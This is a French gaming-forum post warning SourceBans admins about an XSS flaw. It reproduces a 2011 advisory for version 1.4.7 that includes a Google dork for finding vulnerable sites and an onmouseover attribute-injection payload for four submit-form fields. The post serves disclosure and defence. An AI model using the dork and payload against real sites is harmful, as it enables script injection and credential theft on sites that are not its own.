Aller au contenu
News ticker
  • Bienvenue sur le nouveau forum VeryGames
  • Welcome to the new VeryGames forum
  • VeryNews

    SourceBans Vulnerability (XSS)


    cmer

    Messages recommandés

    Salut,

     

    Il existe un faille sur le sourcebans afin de vous protéger veuillez désactiver le submitBan

     

     

    # Exploit Title: SourceBans Version 1.4.7 XSS
    # Google Dork: inurl:"sourcebans/index.php?p=submit"
    # Date: Feb. 9th 2011
    # Author: Sw1tCh
    # Software Link: http://www.sourcebans.net/
    # Version: 1.4.7
    
    
    Info:
    SourceBans is an application for managing publicly the banned users for a Steam Server. 
    
    #-= The Advisory =-
    SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.
    
    #-= Example =-
    
    http://<SITE>/sourcebans/index.php?p=submit
    
    - > BanIP => " onmouseover=prompt(928137) bad="
    - > Comments => " onmouseover=prompt(928137) bad="
    - > Name => " onmouseover=prompt(928137) bad="
    - > Email => " onmouseover=prompt(928137) bad="
    
    
    
    
    #Disclosure Information:
    - Vulnerability found and researched: January 18th 2011
    - Vendor (SourceBans) contacted: January 18th 2011
    [ Time Reduced because Ops of IRC channel were dicks ] 
    - Disclosed to Exploit-DB, Bugtraq and InterN0T: 
    
    
    
    
    
    #Credits: Sw1tCh
    
    #Shoutouts : gen0cide, Scruffy, Griff, D00dl3, 

     

    Un patch devrez voir le jour bientôt :)

    Lien vers le commentaire
    Partager sur d’autres sites

    Rejoindre la conversation

    Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

    Invité
    Répondre à ce sujet…

    ×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

      Seulement 75 émoticônes maximum sont autorisées.

    ×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

    ×   Votre contenu précédent a été rétabli.   Vider l’éditeur

    ×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

    ×
    ×
    • Créer...